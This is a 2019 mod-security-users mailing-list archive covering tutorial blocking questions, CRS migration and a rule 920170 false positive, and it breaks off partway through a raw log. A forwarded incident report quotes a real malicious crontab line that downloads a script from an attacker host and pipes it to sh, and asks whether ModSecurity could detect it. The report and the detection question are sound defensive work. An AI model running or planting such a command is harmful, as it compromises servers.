mod-security-users — General discussion about mod_security

Re: [mod-security-users] Help (Mistake with Mod_security blocking list)

[Ted T. <tal...@ho...>]

Hi Christian

No sir, my question is based on only your tutorial.
The point is that having html response does not mean it is blocked, rather it means opposite.
Since in <title> you can write anything, which (403 Forbidden) is different from what you wrote as "We want to respond to such a request with HTTP status 403."


<title>403 Forbidden</title>

In short, we see no blocking (HTTP status 403) in <Step 7: Trying out the blockade>.
https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/
Embedding ModSecurity – Welcome to netnea<https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/>
What are we doing? We are compiling the ModSecurity module, embedding it in the Apache web server, creating a base configuration and dealing with false positives for the first time.. Why are we doing this?
www.netnea.com



Embedding ModSecurity – Welcome to netnea<https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/>
What are we doing? We are compiling the ModSecurity module, embedding it in the Apache web server, creating a base configuration and dealing with false positives for the first time.. Why are we doing this?
www.netnea.com





________________________________
From: Christian Folini <chr...@ne...>
Sent: Friday, May 3, 2019 8:52 AM
To: mod...@li...
Subject: Re: [mod-security-users] Help (Mistake with Mod_security blocking list)

Hi Ted,

You may want to share your configuration with us so we can understand, why it
is not blocking.

You did add the rule to block this, did not you?

Cheers,

Christian

On Fri, May 03, 2019 at 08:44:56AM +0000, Ted Talaiti wrote:
> Hello
>
>  In following tutorial,  you wrote "access to a specific URI on the server is blocked. We want to respond to such a request with HTTP status 403."
> when you try out with blockade,
>
>  $> curl http://localhost/phpmyadmin
>
> It didn't block (since no such HTTP status 403), rather the access is allowed to the URI.
>
> https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity<https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/>
>
> Embedding ModSecurity – Welcome to netnea<https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/>
> What are we doing? We are compiling the ModSecurity module, embedding it in the Apache web server, creating a base configuration and dealing with false positives for the first time.. Why are we doing this?
> www.netnea.com<http://www.netnea.com>
>
> Please correct me if I am wrong.
> Regards
>
>
>
> ________________________________
> From: Ted Talaiti <tal...@ho...>
> Sent: Thursday, April 25, 2019 3:20 PM
> To: mod...@li...
> Subject: Re: [mod-security-users] Help (migrate Mod_security with CRS)
>
> Hi thanks for your reply.
> But there is no information of exporting /importing modsecurity /CRS from server /linux to another.
> Please shed some light.
> Thanks a lot.
> ________________________________
> From: Christian Folini <chr...@ne...>
> Sent: Thursday, April 25, 2019 12:56:25 PM
> To: mod...@li...
> Subject: Re: [mod-security-users] Help (migrate Mod_security with CRS)
>
> Hi Ted,
>
> I suggest you take a peek at the detailed tutorials at
> https://netnea.com/apache-tutorials
>
> They are meant to cover your use case.
>
> Best,
>
> Christian
>
>
> On Thu, Apr 25, 2019 at 12:38:18PM +0000, Ted Talaiti wrote:
> > Hello
> >
> >   I need to implement Mod_security with CRS in apache server of linux in aws from scratch, and then test it.
> > Is there any detailed descriptions of steps of Mod_security installation and configurations (in apache) available, please ?
> >
> > Can we move a well configured Mod_security with CRS from a server in aws to another server in different cloud?
> >
> > Thanks a lot for your attention.
> > Sincerely
> >
>
>
> > _______________________________________________
> > mod-security-users mailing list
> > mod...@li...
> > https://lists.sourceforge.net/lists/listinfo/mod-security-users
> > Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> > http://www.modsecurity.org/projects/commercial/rules/
> > http://www.modsecurity.org/projects/commercial/support/
>
>
>
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/


> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/



_______________________________________________
mod-security-users mailing list
mod...@li...
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
http://www.modsecurity.org/projects/commercial/rules/
http://www.modsecurity.org/projects/commercial/support/

Re: [mod-security-users] Help (Mistake with Mod_security blocking list)

[Christian F. <chr...@ne...>]

Hi Ted,

You may want to share your configuration with us so we can understand, why it
is not blocking.

You did add the rule to block this, did not you?

Cheers,

Christian

On Fri, May 03, 2019 at 08:44:56AM +0000, Ted Talaiti wrote:
> Hello
> 
>  In following tutorial,  you wrote "access to a specific URI on the server is blocked. We want to respond to such a request with HTTP status 403."
> when you try out with blockade,
> 
>  $> curl http://localhost/phpmyadmin
> 
> It didn't block (since no such HTTP status 403), rather the access is allowed to the URI.
> 
> https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity<https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/>
> 
> Embedding ModSecurity – Welcome to netnea<https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/>
> What are we doing? We are compiling the ModSecurity module, embedding it in the Apache web server, creating a base configuration and dealing with false positives for the first time.. Why are we doing this?
> www.netnea.com
> 
> Please correct me if I am wrong.
> Regards
> 
> 
> 
> ________________________________
> From: Ted Talaiti <tal...@ho...>
> Sent: Thursday, April 25, 2019 3:20 PM
> To: mod...@li...
> Subject: Re: [mod-security-users] Help (migrate Mod_security with CRS)
> 
> Hi thanks for your reply.
> But there is no information of exporting /importing modsecurity /CRS from server /linux to another.
> Please shed some light.
> Thanks a lot.
> ________________________________
> From: Christian Folini <chr...@ne...>
> Sent: Thursday, April 25, 2019 12:56:25 PM
> To: mod...@li...
> Subject: Re: [mod-security-users] Help (migrate Mod_security with CRS)
> 
> Hi Ted,
> 
> I suggest you take a peek at the detailed tutorials at
> https://netnea.com/apache-tutorials
> 
> They are meant to cover your use case.
> 
> Best,
> 
> Christian
> 
> 
> On Thu, Apr 25, 2019 at 12:38:18PM +0000, Ted Talaiti wrote:
> > Hello
> >
> >   I need to implement Mod_security with CRS in apache server of linux in aws from scratch, and then test it.
> > Is there any detailed descriptions of steps of Mod_security installation and configurations (in apache) available, please ?
> >
> > Can we move a well configured Mod_security with CRS from a server in aws to another server in different cloud?
> >
> > Thanks a lot for your attention.
> > Sincerely
> >
> 
> 
> > _______________________________________________
> > mod-security-users mailing list
> > mod...@li...
> > https://lists.sourceforge.net/lists/listinfo/mod-security-users
> > Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> > http://www.modsecurity.org/projects/commercial/rules/
> > http://www.modsecurity.org/projects/commercial/support/
> 
> 
> 
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/


> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/

Re: [mod-security-users] Help (Mistake with Mod_security blocking list)

[Ted T. <tal...@ho...>]

Hello

 In following tutorial,  you wrote "access to a specific URI on the server is blocked. We want to respond to such a request with HTTP status 403."
when you try out with blockade,

 $> curl http://localhost/phpmyadmin

It didn't block (since no such HTTP status 403), rather the access is allowed to the URI.

https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity<https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/>

Embedding ModSecurity – Welcome to netnea<https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/>
What are we doing? We are compiling the ModSecurity module, embedding it in the Apache web server, creating a base configuration and dealing with false positives for the first time.. Why are we doing this?
www.netnea.com

Please correct me if I am wrong.
Regards



________________________________
From: Ted Talaiti <tal...@ho...>
Sent: Thursday, April 25, 2019 3:20 PM
To: mod...@li...
Subject: Re: [mod-security-users] Help (migrate Mod_security with CRS)

Hi thanks for your reply.
But there is no information of exporting /importing modsecurity /CRS from server /linux to another.
Please shed some light.
Thanks a lot.
________________________________
From: Christian Folini <chr...@ne...>
Sent: Thursday, April 25, 2019 12:56:25 PM
To: mod...@li...
Subject: Re: [mod-security-users] Help (migrate Mod_security with CRS)

Hi Ted,

I suggest you take a peek at the detailed tutorials at
https://netnea.com/apache-tutorials

They are meant to cover your use case.

Best,

Christian


On Thu, Apr 25, 2019 at 12:38:18PM +0000, Ted Talaiti wrote:
> Hello
>
>   I need to implement Mod_security with CRS in apache server of linux in aws from scratch, and then test it.
> Is there any detailed descriptions of steps of Mod_security installation and configurations (in apache) available, please ?
>
> Can we move a well configured Mod_security with CRS from a server in aws to another server in different cloud?
>
> Thanks a lot for your attention.
> Sincerely
>


> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/



_______________________________________________
mod-security-users mailing list
mod...@li...
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
http://www.modsecurity.org/projects/commercial/rules/
http://www.modsecurity.org/projects/commercial/support/

[mod-security-users] CRS News for May 2019 published

[Christian F. <chr...@ne...>]

Hello,

The OWASP ModSecurity Core Rule Set project news for May 2019 are out

https://coreruleset.org/20190501/crs-project-news-may-2019/

Retweets are welcome:

https://twitter.com/CoreRuleSet/status/1123919574762754050

This month, we cover the pending regular expression DoS problems on ModSec3
with CRS at higher paranoia levels. And some additional infos you might like.

Best,

Christian

-- 
One sign that you’ve approached actual mastery of a subject is that
you get less arrogant; because you’ve spent so much time being wrong.
-- Matthew D. Green

[mod-security-users] (no subject)

[Sadaf M. <sad...@gm...>]

Re: [mod-security-users] Help (migrate Mod_security with CRS)

[Eero V. <eer...@ik...>]

Just copy rules and config files. Some linux knowledge is required..

Eero

On Thu, Apr 25, 2019, 18:21 Ted Talaiti <tal...@ho...> wrote:

> Hi thanks for your reply.
> But there is no information of exporting /importing modsecurity /CRS from
> server /linux to another.
> Please shed some light.
> Thanks a lot.
> ------------------------------
> *From:* Christian Folini <chr...@ne...>
> *Sent:* Thursday, April 25, 2019 12:56:25 PM
> *To:* mod...@li...
> *Subject:* Re: [mod-security-users] Help (migrate Mod_security with CRS)
>
> Hi Ted,
>
> I suggest you take a peek at the detailed tutorials at
> https://netnea.com/apache-tutorials
>
> They are meant to cover your use case.
>
> Best,
>
> Christian
>
>
> On Thu, Apr 25, 2019 at 12:38:18PM +0000, Ted Talaiti wrote:
> > Hello
> >
> >   I need to implement Mod_security with CRS in apache server of linux in
> aws from scratch, and then test it.
> > Is there any detailed descriptions of steps of Mod_security installation
> and configurations (in apache) available, please ?
> >
> > Can we move a well configured Mod_security with CRS from a server in aws
> to another server in different cloud?
> >
> > Thanks a lot for your attention.
> > Sincerely
> >
>
>
> > _______________________________________________
> > mod-security-users mailing list
> > mod...@li...
> > https://lists.sourceforge.net/lists/listinfo/mod-security-users
> > Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> > http://www.modsecurity.org/projects/commercial/rules/
> > http://www.modsecurity.org/projects/commercial/support/
>
>
>
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/
>

Re: [mod-security-users] Help (migrate Mod_security with CRS)

[Ted T. <tal...@ho...>]

Hi thanks for your reply.
But there is no information of exporting /importing modsecurity /CRS from server /linux to another.
Please shed some light.
Thanks a lot.
________________________________
From: Christian Folini <chr...@ne...>
Sent: Thursday, April 25, 2019 12:56:25 PM
To: mod...@li...
Subject: Re: [mod-security-users] Help (migrate Mod_security with CRS)

Hi Ted,

I suggest you take a peek at the detailed tutorials at
https://netnea.com/apache-tutorials

They are meant to cover your use case.

Best,

Christian


On Thu, Apr 25, 2019 at 12:38:18PM +0000, Ted Talaiti wrote:
> Hello
>
>   I need to implement Mod_security with CRS in apache server of linux in aws from scratch, and then test it.
> Is there any detailed descriptions of steps of Mod_security installation and configurations (in apache) available, please ?
>
> Can we move a well configured Mod_security with CRS from a server in aws to another server in different cloud?
>
> Thanks a lot for your attention.
> Sincerely
>


> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/



_______________________________________________
mod-security-users mailing list
mod...@li...
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
http://www.modsecurity.org/projects/commercial/rules/
http://www.modsecurity.org/projects/commercial/support/

Re: [mod-security-users] Help (migrate Mod_security with CRS)

[Christian F. <chr...@ne...>]

Hi Ted,

I suggest you take a peek at the detailed tutorials at
https://netnea.com/apache-tutorials

They are meant to cover your use case.

Best,

Christian


On Thu, Apr 25, 2019 at 12:38:18PM +0000, Ted Talaiti wrote:
> Hello
> 
>   I need to implement Mod_security with CRS in apache server of linux in aws from scratch, and then test it.
> Is there any detailed descriptions of steps of Mod_security installation and configurations (in apache) available, please ?
> 
> Can we move a well configured Mod_security with CRS from a server in aws to another server in different cloud?
> 
> Thanks a lot for your attention.
> Sincerely
> 


> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/

Re: [mod-security-users] Help (migrate Mod_security with CRS)

[Eero V. <eer...@ik...>]

How about reading documentation:
https://www.modsecurity.org/CRS/Documentation/

Yes, you can copy installation to another server.. too.

On Thu, Apr 25, 2019 at 3:39 PM Ted Talaiti <tal...@ho...> wrote:

> Hello
>
>   I need to implement Mod_security with CRS in apache server of linux in
> aws from scratch, and then test it.
> Is there any detailed descriptions of steps of Mod_security installation
> and configurations (in apache) available, please ?
>
> Can we move a well configured Mod_security with CRS from a server in aws
> to another server in different cloud?
>
> Thanks a lot for your attention.
> Sincerely
>
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/
>

[mod-security-users] Help (migrate Mod_security with CRS)

[Ted T. <tal...@ho...>]

Hello

  I need to implement Mod_security with CRS in apache server of linux in aws from scratch, and then test it.
Is there any detailed descriptions of steps of Mod_security installation and configurations (in apache) available, please ?

Can we move a well configured Mod_security with CRS from a server in aws to another server in different cloud?

Thanks a lot for your attention.
Sincerely

[mod-security-users] Fwd: [clamav-users] LSD Malwares

[Brent C. <bre...@gm...>]

Good day Guys

I just came across the following on the Clamav mailinglist.

Is this not something that can be added to Modsecurity ruleset?
For example look at '||wget' and ')|sh'.

Regards
Brent Clark


-------- Forwarded Message --------
Subject: 	[clamav-users] LSD Malwares
Date: 	Thu, 25 Apr 2019 14:52:05 +0530
From: 	Xavier Maysonnave via clamav-users <cla...@li...>
Reply-To: 	ClamAV users ML <cla...@li...>
To: 	cla...@li...
CC: 	Xavier Maysonnave <x.m...@gm...>



Dear Friends,

We recently faced an Atlassian Confluence issue lately.
Atlassian issued a security advisory the 29/03/2019 
<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>.
Following this thread 
<https://community.atlassian.com/t5/Confluence-discussions/khugepageds-eating-all-of-the-CPU/td-p/1055337>, 
We understood what happened on our server.
Confluence is running in its own user space and have seen its crontab 
hacked.

On our Debian Stretch the 'crontab -u confluence -e' shows a non legit 
instruction :

*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget 
<http://dd.heheda.tk/i.jpg||wget> -q -O- https://dd.heheda.tk/i.jpg)|sh


Obviously the security flaw in Confluence open the gate to this behaviour.
As we are running Confluence in its own user space, the i.jpg who 
contains the shell script file didn't harm our server. No malwares have 
been deployed however the server was shutting down immediately after 
starting.

We cleaned up the crontab and upgraded Confluence to avoid any further 
infection.

However we need to check our installation and I'm wondering if ClamAV 
knows already this malware family 
<https://git.laucyun.com/security/lsd_malware_clean_tool/blob/master/README.md>. 
I already open a report to ClamAV. is there any user who faced this 
issue and is ClamAV ready to detect and cleanup our Linux boxes ?

Any pointers about any informations about this LSD Malware family will 
be greatly appreciated as I try to evaluate the risks for our 
infrastructure (I checked various DB with no success and googled too).

Warmly.

Light

Pudhuveedu / Xavier

PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9 
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>

Re: [mod-security-users] Rule "GET or HEAD Request with Body Content." is catching a "POST" method

[Christian V. <cv...@it...>]

Thanks  Ervin,

I didin't note the size of Content-Lenght, for sure this is not a normal
request :P

Cheers.

El 22-04-19 a las 17:10, Ervin Hegedüs escribió:
> Hi Christian,
>
> On Mon, Apr 22, 2019 at 04:22:27PM -0300, Christian Varas wrote:
>> Hello, i'm having a small issue with modsecurity and nginx
>>
>> I'm getting the following blocking with the rule "GET or HEAD Request
>> with Body Content."
>>
>> The thing is that this rule is catching a wrong method.
>>
>> I'm sending this POST with a normal body content
> I think this isn't a "normal" request :)
>
>> *POST* /informacion-general-de-bomberos HTTP/1.1
>> Host: www.bomberos.cl
>> Content-Length: 33480
> ^^^^^^^^^^^^^^^^^^^^^^^
>
>> Cache-Control: max-age=0
> ...
>
>> Connection: close
> the body starts here:
>
>> ------WebKitFormBoundary85SDZfedhQBpvDB6
>> Content-Disposition: form-data; name="q"
>>
>> #
>> ------WebKitFormBoundary85SDZfedhQBpvDB6
>> Content-Disposition: form-data; name="option"
>>
>> com_contenido
>> ------WebKitFormBoundary85SDZfedhQBpvDB6
>> Content-Disposition: form-data; name="Itemid"
>>
>> 647
>> ------WebKitFormBoundary85SDZfedhQBpvDB6
>> Content-Disposition: form-data; name="task"
>>
>> buscarContenido
>> ------WebKitFormBoundary85SDZfedhQBpvDB6--
> the length of the bidy is 424 char (plus the CR characters at the
> end of the lines, they are 17 - so 424+17 = 441).
>  
>> "headers":{"Accept":"text/html...", ... ,"Content-Length":"441"
>> "components":["OWASP_CRS/3.1.0\""**]*},"messages":[{"message":"GET or HEAD Request with Body Content.","details":{"match":"Matched \"Operator `Rx' with parameter `^0?$' against variable `REQUEST_HEADERS:Content-Length' (Value: `441')",
> I think the Nginx waits a 33480 length body, but only got 441 - I
> assume that this is a unique Nginx behavior....
>
> I've tried your request, only replaced the Content-Length to 424,
> and everything worked well.
>
> Hope this helps.
>
>
> a.
>
>
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/

-- 

Chris

Re: [mod-security-users] Rule "GET or HEAD Request with Body Content." is catching a "POST" method

[Ervin H. <ai...@gm...>]

Hi Christian,

On Mon, Apr 22, 2019 at 04:22:27PM -0300, Christian Varas wrote:
> Hello, i'm having a small issue with modsecurity and nginx
> 
> I'm getting the following blocking with the rule "GET or HEAD Request
> with Body Content."
> 
> The thing is that this rule is catching a wrong method.
> 
> I'm sending this POST with a normal body content

I think this isn't a "normal" request :)

> *POST* /informacion-general-de-bomberos HTTP/1.1
> Host: www.bomberos.cl
> Content-Length: 33480
^^^^^^^^^^^^^^^^^^^^^^^

> Cache-Control: max-age=0
...

> Connection: close

the body starts here:

> 
> ------WebKitFormBoundary85SDZfedhQBpvDB6
> Content-Disposition: form-data; name="q"
> 
> #
> ------WebKitFormBoundary85SDZfedhQBpvDB6
> Content-Disposition: form-data; name="option"
> 
> com_contenido
> ------WebKitFormBoundary85SDZfedhQBpvDB6
> Content-Disposition: form-data; name="Itemid"
> 
> 647
> ------WebKitFormBoundary85SDZfedhQBpvDB6
> Content-Disposition: form-data; name="task"
> 
> buscarContenido
> ------WebKitFormBoundary85SDZfedhQBpvDB6--

the length of the bidy is 424 char (plus the CR characters at the
end of the lines, they are 17 - so 424+17 = 441).
 
> "headers":{"Accept":"text/html...", ... ,"Content-Length":"441"

> "components":["OWASP_CRS/3.1.0\""**]*},"messages":[{"message":"GET or HEAD Request with Body Content.","details":{"match":"Matched \"Operator `Rx' with parameter `^0?$' against variable `REQUEST_HEADERS:Content-Length' (Value: `441')",

I think the Nginx waits a 33480 length body, but only got 441 - I
assume that this is a unique Nginx behavior....

I've tried your request, only replaced the Content-Length to 424,
and everything worked well.

Hope this helps.


a.

Re: [mod-security-users] Rule "GET or HEAD Request with Body Content." is catching a "POST" method

[Jose R R <jos...@me...>]

Niltze, Chris-

"I haven't updated the components in a few months, maybe in a new
version this is fixed."

If you are using the ModSecurity v3 with the libmodsecurity3 Nginx
Connector module, you might as well 'update your components'.

Recently I integrated the libmodsecurity3 Nginx Connector module into
Nginx 1.15.9 for Debian packaging build for a migration, deployed, and
I have not experienced anything similar to what you describe.

---------- Forwarded message ---------
From: Christian Varas <cv...@it...>
Date: Mon, Apr 22, 2019 at 12:23 PM
Subject: [mod-security-users] Rule "GET or HEAD Request with Body
Content." is catching a "POST" method
To: <mod...@li...>


Hello, i'm having a small issue with modsecurity and nginx

I'm getting the following blocking with the rule "GET or HEAD Request
with Body Content."

The thing is that this rule is catching a wrong method.

I'm sending this POST with a normal body content

POST /informacion-general-de-bomberos HTTP/1.1
Host: www.bomberos.cl
Content-Length: 33480
Cache-Control: max-age=0
Origin: http://www.bomberos.cl
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary85SDZfedhQBpvDB6
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.bomberos.cl/informacion-general-de-bomberos
Accept-Encoding: gzip, deflate
Accept-Language: es-MX,es;q=0.9,en-US;q=0.8,en;q=0.7,es-419;q=0.6
Cookie: 3207237d144523bf443786e09bde1502=plvhocs15n7eqp53og9mv9oq35;
__utma=153413291.1309598240.1555956994.1555956994.1555956994.1;
__utmc=153413291;
__utmz=153413291.1555956994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmt=1; __utmb=153413291.7.10.1555956994
Connection: close

------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="q"

#
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="option"

com_contenido
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="Itemid"

647
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="task"

buscarContenido
------WebKitFormBoundary85SDZfedhQBpvDB6--

This is the blocking info (catching a GET method but the request sent
is a POST):

Raw log:

{"transaction":{"client_ip":"190.215.55.78","time_stamp":"Mon Apr 22
14:34:45 2019","server_id":"7c160a00ee79198f898d4dd10daa0650753069e4","client_port":51391,"host_ip":"190.215.55.78","host_port":80,"unique_id":"155595808524.898826","request":{"method":"GET","http_version":1.1,"uri":"/informacion-general-de-bomberos","body":"------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition:
form-data; name=\"q\"\r\n\r\n#\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition:
form-data; name=\"option\"\r\n\r\ncom_contenido\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition:
form-data; name=\"Itemid\"\r\n\r\n647\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition:
form-data; name=\"task\"\r\n\r\nbuscarContenido\r\n------WebKitFormBoundary85SDZfedhQBpvDB6--\r\n","headers":{"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","Cache-Control":"max-age=0","Content-Type":"multipart/form-data;
boundary=----WebKitFormBoundary85SDZfedhQBpvDB6","User-Agent":"Mozilla/5.0
(X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/73.0.3683.75
Safari/537.36","DNT":"1","Origin":"http://www.bomberos.cl","Upgrade-Insecure-Requests":"1","Referer":"http://www.bomberos.cl/informacion-general-de-bomberos","Content-Length":"441","Host":"www.bomberos.cl","Accept-Encoding":"gzip,
deflate","Cookie":"3207237d144523bf443786e09bde1502=plvhocs15n7eqp53og9mv9oq35;
__utma=153413291.1309598240.1555956994.1555956994.1555956994.1;
__utmc=153413291;
__utmz=153413291.1555956994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmt=1; __utmb=153413291.7.10.1555956994","Accept-Language":"es-MX,es;q=0.9,en-US;q=0.8,en;q=0.7,es-419;q=0.6","Connection":"close"}},"response":{"http_code":403},"producer":{"modsecurity":"ModSecurity
v3.0.3 (Linux)","connector":"ModSecurity-nginx
v1.0.0","secrules_engine":"Enabled","components":["OWASP_CRS/3.1.0\""]},"messages":[{"message":"GET
or HEAD Request with Body Content.","details":{"match":"Matched
\"Operator `Rx' with parameter `^0?$' against variable
`REQUEST_HEADERS:Content-Length' (Value: `441'
)","reference":"o0,3v0,3v84,3","ruleId":"920170","file":"/opt/waf/nginx/etc/modsec_rules/www.bomberos.cl/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"229","data":"GET","severity":"2","ver":"OWASP_CRS/3.1.0","rev":"","tags":[],"maturity":"0","accuracy":"0"}},{"message":"GET
or HEAD Request with Body Content.","details":{"match":"Matched
\"Operator `Rx' with parameter `^0?$' against variable
`REQUEST_HEADERS:Content-Length' (Value: `441'
)","reference":"o0,3v0,3v84,3","ruleId":"920170","file":"/opt/waf/nginx/etc/modsec_rules/www.bomberos.cl/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"229","data":"GET","severity":"2","ver":"OWASP_CRS/3.1.0","rev":"","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ","CAPEC-272"],"maturity":"0","accuracy":"0"}}]}}

Does anyone having the same issue ?

I haven't updated the components in a few months, maybe in a new
version this is fixed.

Cheers.

Chris.
[]

Best Professional Regards.

-- 
Jose R R
http://metztli.it
---------------------------------------------------------------------------------------------
Download Metztli Reiser4: Debian Stretch w/ Linux 4.20 AMD64
---------------------------------------------------------------------------------------------
feats ZSTD compression https://sf.net/projects/metztli-reiser4/
-------------------------------------------------------------------------------------------
Official current Reiser4 resources: https://reiser4.wiki.kernel.org/

[mod-security-users] Rule "GET or HEAD Request with Body Content." is catching a "POST" method

[Christian V. <cv...@it...>]

Hello, i'm having a small issue with modsecurity and nginx

I'm getting the following blocking with the rule "GET or HEAD Request
with Body Content."

The thing is that this rule is catching a wrong method.

I'm sending this POST with a normal body content

*POST* /informacion-general-de-bomberos HTTP/1.1
Host: www.bomberos.cl
Content-Length: 33480
Cache-Control: max-age=0
Origin: http://www.bomberos.cl
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary85SDZfedhQBpvDB6
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.bomberos.cl/informacion-general-de-bomberos
Accept-Encoding: gzip, deflate
Accept-Language: es-MX,es;q=0.9,en-US;q=0.8,en;q=0.7,es-419;q=0.6
Cookie: 3207237d144523bf443786e09bde1502=plvhocs15n7eqp53og9mv9oq35;
__utma=153413291.1309598240.1555956994.1555956994.1555956994.1;
__utmc=153413291;
__utmz=153413291.1555956994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmt=1; __utmb=153413291.7.10.1555956994
Connection: close

------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="q"

#
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="option"

com_contenido
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="Itemid"

647
------WebKitFormBoundary85SDZfedhQBpvDB6
Content-Disposition: form-data; name="task"

buscarContenido
------WebKitFormBoundary85SDZfedhQBpvDB6--

This is the blocking info (catching a GET method but the request sent is
a POST):

Raw log:

{"transaction":{"client_ip":"190.215.55.78","time_stamp":"Mon Apr 22
14:34:45
2019","server_id":"7c160a00ee79198f898d4dd10daa0650753069e4","client_port":51391,"host_ip":"190.215.55.78","host_port":80,"unique_id":"155595808524.898826","request":{"*method":"GET"*,"http_version":1.1,"uri":"/informacion-general-de-bomberos","body":"------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition:
